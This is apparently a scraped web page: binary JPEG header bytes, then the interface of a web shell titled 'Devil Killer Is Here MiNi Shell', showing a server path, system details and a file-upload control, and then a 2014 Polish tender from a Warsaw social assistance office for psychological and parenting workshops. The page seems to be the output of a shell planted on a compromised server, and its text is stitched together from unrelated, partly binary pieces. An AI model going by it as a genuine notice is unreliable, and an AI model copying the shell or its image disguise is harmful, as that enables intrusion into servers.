JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/146738-N-2014.html

<p class="kh_header"><b>Warszawa: Przedmiotem zamówienia jest realizacja warsztatów  z zakresu: grupy interpersonalnej, komunikacji interpersonalnych, radzenia sobie ze stresem, asertywności, budowania poczucia własnej wartości, motywacji, czyli zarządzania zmianą, psychoedukacji, prowadzenie grupy wsparcia, oraz umiejętności wychowawczych.</b><br>
<b>Numer ogłoszenia: 146738 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursus m.st. Warszawy , Plac Czerwca 1976 r. Nr 1, 02-495 Warszawa, woj. mazowieckie, tel. 022 4784111, faks 022 4784101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-ursus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest realizacja warsztatów  z zakresu: grupy interpersonalnej, komunikacji interpersonalnych, radzenia sobie ze stresem, asertywności, budowania poczucia własnej wartości, motywacji, czyli zarządzania zmianą, psychoedukacji, prowadzenie grupy wsparcia, oraz umiejętności wychowawczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja warsztatów  z zakresu: grupy interpersonalnej, komunikacji interpersonalnych, radzenia sobie ze stresem, asertywności, budowania poczucia własnej wartości, motywacji, czyli zarządzania zmianą, psychoedukacji, prowadzenie grupy wsparcia, oraz umiejętności wychowawczych.

Zamawiający dopuszcza możliwość realizacji warsztatów w weekendy po każdorazowej konsultacji z koordynatorem. 

Warsztat Nr 1 

Grupa interpersonalna - warsztat wprowadzający w pracę warsztatową nad budowaniem umiejętności interpersonalnych i motywacji do zmiany dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość

Cele i zakres tematyczny warsztatów:
Integracja grupy
Zapoznanie się członków każdej grupy
Zbudowanie poczucia bezpieczeństwa i otwartości w dzieleniu się doświadczeniami 
Zbudowanie postawy zaangażowanej i zmotywowanej do zmiany
Zaznajomienie się z celami i formułą pracy w grupie warsztatowej
Wyznaczenie indywidualnych celów uczestnictwa w projekcie
Zbudowanie motywacji do działania i zaangażowania w zadania projektowe
Wyznaczenie indywidualnych korzyści uczestnictwa w projekcie
Wprowadzenie elementów integracji w formie np. treningu twórczości
Umożliwienie uczestnikom sformułowania indywidualnych definicji ich zmiany osobistej i zawodowej, - w jaki sposób poznają czym jest zmiana, jakich działań od nich wymaga wprowadzenie zmiany.
Warsztaty dla 2 grup po  14 osób,  z czego każda grupa ma wypracować 6h zegarowych, razem 1 spotkanie dla każdej z grup.  Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 12h.  
Czas pracy 6 h w godzinach: rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat Nr 2

Warsztaty z zakresu komunikacji interpersonalnej dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość

Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat konstruktywnej komunikacji interpersonalnej
Praca nad barierami komunikacyjnymi
Ćwiczenie dobrej komunikacji interpersonalnej
Aspekty komunikacji interpersonalnej w środowisku zawodowym
Warsztaty dla 2 grup po  14 osób  z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup.  Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 24h  
Czas pracy: 2 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat Nr 3 
Warsztaty z zakresu radzenia sobie ze stresem z elementami technik relaksacyjnych dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość

Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat emocji
Nauka radzenia sobie z trudnymi emocjami (złość)
Nauka radzenia sobie z nieprzyjemnymi emocjami (smutek) i wywołującymi stres, napięcie.
Nauka radzenia sobie z emocjami w sytuacjach konfliktowych i trudnych
Trening radzenia sobie z emocjami własnymi i innych osób
Metody i techniki relaksacyjne

Warsztaty dla 2 grup po  14 osób  z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup.  Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 24h  
Czas pracy: 2 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat Nr 4 
Warsztaty z zakresu asertywności i rozwiązywania konfliktów dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość.

Cele i zakres tematyczny warsztatów:
Przekazanie wiedzy na temat asertywności - czym jest, kto to jest osoba asertywna
Ćwiczenie postawy asertywnej w środowisku rodzinnym i zawodowym
Nauka radzenia sobie w sytuacjach trudnych i konfliktowych z wykorzystaniem postawy asertywnej
Sposoby rozwiązywania konfliktów w relacjach osobistych i zawodowych
Radzenie sobie ze złością i innymi emocjami w sytuacjach trudnych i konfliktowych

Warsztaty dla 2 grup po 14 osób z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 24h.  
Czas pracy: 2 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat Nr 5
Warsztaty z zakresu budowania poczucia własnej wartości dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość.

Cele i zakres tematyczny warsztatów:
Poznanie swoich mocnych i słabych stron;
Zbudowanie pozytywnego obrazu własnej osoby;
Zwiększenie wiary we własne możliwości;
Wzmocnienie samoakceptacji, poczucia pewności siebie i poczucia wartości;
Zwiększenie poczucia sprawczości w sytuacjach osobistych i zawodowych;
Umiejętność budowania pozytywnych przekonań na temat własnej osoby;
Nauka wyrażania i prezentowania swoich mocnych stron;

Warsztaty dla 2 grup po 14 osób z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 24h.  
Czas pracy: 2 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat Nr 6
Warsztaty z zakresu motywacji, czyli zarządzanie zmianą dla 28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość.

Cele i zakres tematyczny warsztatów:
Pozytywne i negatywne aspekty dokonywania zmian
Siły wspierające i siły hamujące zmiany
Techniki wprowadzania zmian
Zmiana w czasie - planowanie zmian, okres przejściowy
Zmiany a rodzina
Wzmocnienie motywacji
Nabycie umiejętności wychodzenia z sytuacji kryzysowych i trudnych
Praca nad pozytywnym myśleniem i odnajdywaniem pozytywnych aspektów
Elementy budowania poczucia własnej wartości i pewności siebie
Warsztaty dla 2 grup po 14 osób z czego każda grupa ma wypracować 18h zegarowych, razem 3 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 36h. 
Czas pracy: 3 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat nr 7 
Warsztat z zakresu psychoedukacji prozdrowotnej i rodzinnej z elementami profilaktyki dla  28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość.

Cele i zakres tematyczny warsztatów:
Psychoedukacja na temat uzależnień i współuzależnień: co to jest, jakie są konsekwencje społeczne i zdrowotne, jak leczyć jak  rozpoznawać, co jest uzależnieniem jak radzić sobie w sytuacji własnego uzależnienia i osoby bliskiej, gdzie szukać pomocy. 
Profilaktyka uzależnień w domu w relacji  rodzic - dziecko postawa rodzica, w jaki sposób rozpoznawać sygnały niepokojące,  jak rozmawiać, gdzie szukać pomocy
Psychoedukacja na temat dysfunkcji  w rodzinie i ich konsekwencje w funkcjonowaniu systemu rodzinnego i rozwój dzieci
Psychoedukacja : Jak zbudowany jest system rodzinny, Jakie role spełniają poszczególni członkowie rodziny?
Psychoedukacja na temat  systemu rodzinnego, co to jest rodzina, role w rodzinie, rozwój dzieci, relacje i więzi w rodzinie, emocje. 

Warsztaty dla 2 grup po 14 osób z czego każda grupa ma wypracować 12h zegarowych, razem 2 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 24h.  
Czas pracy: 2 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r. 

Warsztat  Nr 8
Grupa wsparcia z elementami terapeutycznymi - spotkania grupowe w wymiarze min. 32  godzin dla ok. 8 - 12 osób.

Cele i zakres tematyczny warsztatów:
wymiana informacji na temat sposobów radzenia sobie w życiu osobistym, rodzinnym i zawodowym
zwiększenie poczucia własnej wartości
zwiększenie umiejętności radzenia sobie w sytuacjach kryzysowych i trudnych również psychologicznie
poprawa funkcjonowania w rodzinie poprzez korektę zachowań i pracę nad trudnościami pojawiającymi się w rodzinie (poszerzenie umiejętności wychowawczych, uświadomienie w roli w rodzinie, DDA, DDD, współuzależnienie, relacje małżeńskie/partnerskie i inne wpływające decyzje i wybory uczestników)
minimalizowanie poczucia osamotnienia w problemach
zwiększenie poczucia sprawstwa w uczestnikach i poczucia wpływu ich na własne życie
motywacja do kontynuowania dalszych działań w procesie zmiany psychologicznej i społecznej
kształcenie umiejętności w zakresie zaufania we własne siły
poprawa funkcjonowania w społeczeństwie
skorygowanie problemów
Warsztaty mające na celu cykliczne (min. 2 razy  w miesiącu) spotkania uczestników projektu z podobnymi trudnościami życiowymi  pod opieką  trenera. Warsztaty te służyć będą wymianie informacji na temat sposobów radzenia sobie, zwiększenia poczucia własnej wartości, minimalizowania poczucia osamotnienia w problemach, kształcenia umiejętności w zakresie zaufania we własne siły, poprawie funkcjonowania w społeczeństwie.
Czas trwania warsztatu dla  grupy to 3-4h zegarowe (min. 2 razy  w miesiącu) od dnia podpisania umowy do  19.12.2014 r. (zamawiający zakłada wypracowanie min. 32h) 
Łącznie warsztat będzie prowadzony w wymiarze min. 32h. 

Warsztat Nr 9
Warsztaty umiejętności wychowawczych
Warsztaty z zakresu umiejętności wychowawczych dla  28 osób mężczyzn i kobiet - uczestników projektu Ja i moja przyszłość.
Cele i zakres tematyczny warsztatów:
Jak stawiać i przestrzegać granic, aby dziecko czuło się bezpiecznie i je respektowało.
Jak rozpoznawać uczucia dziecka i pomóc mu radzić sobie z uczuciami.
Jak zachęcać dziecko do współpracy.
Co zamiast karania.
 Jak konstruktywnie rozwiązywać problemy i konflikty i wspólnie znajdować rozwiązania.
 Jak zachęcać do samodzielności.
Jak uwalniać dziecko od grania ról i sprawić, by uwierzyło w siebie.
Jak chwalić i zachęcać by budować realne poczucie własnej wartości dziecka.
Warsztaty dla 2 grup po 14 osób z czego każda grupa ma wypracować 18h zegarowych, razem 3 spotkania dla każdej z grup. Czas trwania warsztatu dla jednej grupy to 6h zegarowych z uwzględnieniem przerwy na kawę i posiłki. 
Łącznie warsztat będzie prowadzony w wymiarze 36h. 
Czas pracy: 3 warsztaty po 6h dla 2 grup, rozpoczęcie najwcześniej o godz. 09.00  zakończenie najpóźniej o 16.00 w tygodniu - do uzgodnienia z koordynatorem projektu. Z uwagi na fakt, że uczestnicy biorą udział w innych konsultacjach dokładny termin będzie ustalany w trakcie podpisywania umowy.
Czas realizacji warsztatu: od dnia podpisania umowy do 30.09.2014r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych w wysokości 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub wykaże, że będzie dysponował osobami zdolnymi do wykonania zamówienia:

A) min. 2 trenerami skierowanymi do wykonania warsztatów z zakresu umiejętności społecznych nr 1-6 o następujących kwalifikacjach:  
a)wykształcenie  wyższe - psychologia lub pedagogika 
b)uprawnienia do wykonywania zawodu trenera ukończona szkoła trenerów lub inne równoważne uprawnienia z zakresu umiejętności społecznych lub interpersonalnych   z wyłączeniem  uprawnień dla szkoleń biznesowych 
c) wypracowane  min. 150 godzin warsztatów umiejętności interpersonalnych w ciągu 3 ostatnich lat przed upływem terminu składania ofert

Na potwierdzenie spełnienia w/w warunku Wykonawca przedstawi CV min. 2 trenerów oraz następujące dokumenty:
a)kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dyplomu studiów wyższych wyżej opisanych oraz dokument potwierdzający posiadanie uprawnień trenera z zakresu umiejętności społecznych lub interpersonalnych   z wyłączeniem  uprawnień dla szkoleń biznesowych
b)wypełniony załącznik nr 3 Personel potwierdzający  wypracowanie min 150 godzin warsztatów z zakresu umiejętności społecznych lub interpersonalnych w ciągu 3 ostatnich lat przed upływem terminu składania ofert wraz z  referencjami lub innym dokumentami  potwierdzającymi wypracowanie  z należytą starannością min. 150 h wpisanych w załącznik (dla każdego trenera).   Zamawiający nie dopuszcza wpisania w załączniku nr 3 prowadzenia tzw. warsztatów umiejętności twardych z zakresu zarządzania i biznesu.
B) min. 1 trenerem skierowanym do wykonania warsztatu nr 7 pt. Psychoedukacja prozdrowotna i rodzinna z elementami profilaktyki  o następujących kwalifikacjach:
a)wykształcenie  wyższe - psychologia lub pedagogika 
b)ukończona szkoła terapii uzależnień
c)wypracowane  min. 100 godzin warsztatów lub pracy grupowej  w zakresie problematyki uzależnień, współuzależnień, przemocy, DDD, DDA, pracy z rodziną w ciągu 3 ostatnich lat przed upływem terminu składania ofert
Na potwierdzenie spełnienia w/w warunku Wykonawca przedstawi CV min. 1 trenera oraz następujące dokumenty:
a)kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dyplomu studiów wyższych wyżej opisanych oraz dokument potwierdzający ukończenie szkoły terapii uzależnień, 
b)wypełniony załącznik nr 3 Personel potwierdzający  wypracowanie min 100 godzin warsztatów lub pracy grupowej  w zakresie problematyki uzależnień, współuzależnień, przemocy, DDD, DDA, pracy z rodziną w ciągu 3 ostatnich lat przed upływem terminu składania ofert  wraz z  referencjami lub innym dokumentami  potwierdzającymi wypracowanie z należytą starannością min. 100 h wpisanych w załącznik.  
C) min. 1 trenerem skierowanym do prowadzenia grupy wsparcia (warsztat nr 8)  o następujących kwalifikacjach:
a)wykształcenie  wyższe - psychologia 
b)ukończona szkoła psychoterapii
c)prowadzenie min 100h grup wsparcia lub terapeutycznych w zakresie  pracy z osobami z rodzin dysfunkcyjnych, zagrożonych wykluczeniem społecznym, DDA, DDD, z problemem współuzależnień, poradnictwa rodzinnego  w ciągu 3 ostatnich lat przed upływem terminu składania ofert
Na potwierdzenie spełnienia w/w warunku Wykonawca przedstawi CV min. 1 trenera oraz następujące dokumenty:
a)kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dyplomu studiów wyższych wyżej opisanych oraz dokument potwierdzający posiadanie ukończonej szkoły psychoterapii
b)wypełniony załącznik nr 3 Personel potwierdzający prowadzenie min 100h grup wsparcia lub terapeutycznych w zakresie pracy z osobami z rodzin dysfunkcyjnych, zagrożonych wykluczeniem społecznym, DDA, DDD, z problemem współuzależnień, poradnictwa rodzinnego w ciągu 3 ostatnich lat przed upływem terminu składania ofert
D) min. 1 trenerem skierowanym do wykonania warsztatu umiejętności wychowawczych  - warsztat nr 9 o następujących kwalifikacjach:  
a)wykształcenie  wyższe - psychologia lub pedagogika, 
b)ukończony min. 1 kurs podnoszący kwalifikacje w zakresie pracy z rodziną,
c)wypracowane  min. 100 godzin warsztatów w zakresie pracy z rodziną w ciągu 3 ostatnich lat przed upływem terminu składania ofert
Na potwierdzenie spełnienia w/w warunku Wykonawca przedstawi CV min. 1 trenera oraz następujące dokumenty:
a)kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę dyplomu studiów wyższych wyżej opisanych oraz ukończony min. 1 kursu podnoszącego kwalifikacje w zakresie pracy z rodziną,
b)wypełniony załącznik nr 3 Personel potwierdzający  wypracowanie min 100 godzin warsztatów w zakresie pracy z rodziną w ciągu 3 ostatnich lat przed upływem terminu składania ofert wraz z  referencjami lub innym dokumentami  potwierdzającymi wypracowanie  z należytą starannością min. 100 h wpisanych w załącznik. 

Wykonawca w załączniku nr 3 Personel  przedstawi min. 4 trenerów przeznaczonych do wykonania zamówienia oraz dołączy ich CV</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
